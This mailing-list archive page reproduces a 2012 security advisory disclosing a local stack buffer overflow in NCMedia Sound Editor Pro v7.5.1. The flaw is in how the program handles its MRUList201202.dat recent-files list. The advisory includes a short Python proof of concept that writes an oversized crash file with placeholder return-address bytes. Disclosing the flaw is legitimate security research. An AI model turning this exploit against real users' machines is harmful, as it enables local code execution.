lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 16 Sep 2012 18:04:28 +0200 From: Inshell Security <info@...hell.net> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, vuln@...unia.com, submissions@...ketstormsecurity.org, moderators@...db.org Subject: [IA38] NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Sound Editor Pro v7.5.1 Vendor URL: www.soundeditorpro.com Type: Stack-based Buffer Overflow [CWE-121] Date found: 2012-08-15 Date published: 2012-09-16 CVSSv2 Score: 6,9 (AV:L/AC:M/Au:N/C:C/I:C/A:C) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- NCMedia Sound Editor Pro v7.5.1, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- A Local Buffer Overflow Vulnerability has been found on the NCMedia Sound Editor Pro v7.5.1. The application saves the paths for all recently used files in a file called "MRUList201202.dat" in the directory %appdata%\Sound Editor Pro\. When clicking on the "File" menu item the application reads the contents of the file, but does not validate the length of the string loaded from the file before passing it to a buffer, which leads to a Stack-based Buffer Overflow. An attacker needs to force the victim to place an arbitrary "MRUList201202.dat" file into the target directory. 5. PROOF-OF-CONCEPT (CODE / EXPLOIT) ------------------------------------ #!/usr/bin/python file="MRUList201202.dat" junk1="\x41" * 4124 boom="\x42\x42\x42\x42" junk2="\x43" * 100 poc=junk1 + boom + junk2 try: print "[*] Creating exploit file...\n" writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!" except: print "[!] Error while creating file!" For further screenshots and/or PoCs visit: http://security.inshell.net/advisory/38 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2012-08-15: Initial notification sent to vendor 2012-08-22: No response, second notification sent to vendor 2012-08-29: No response, third notification sent to vendor 2012-09-16: No response 2012-09-16: Full Disclosure according to disclosure policy 8. REFERENCES ------------- http://security.inshell.net
Powered by blists - more mailing lists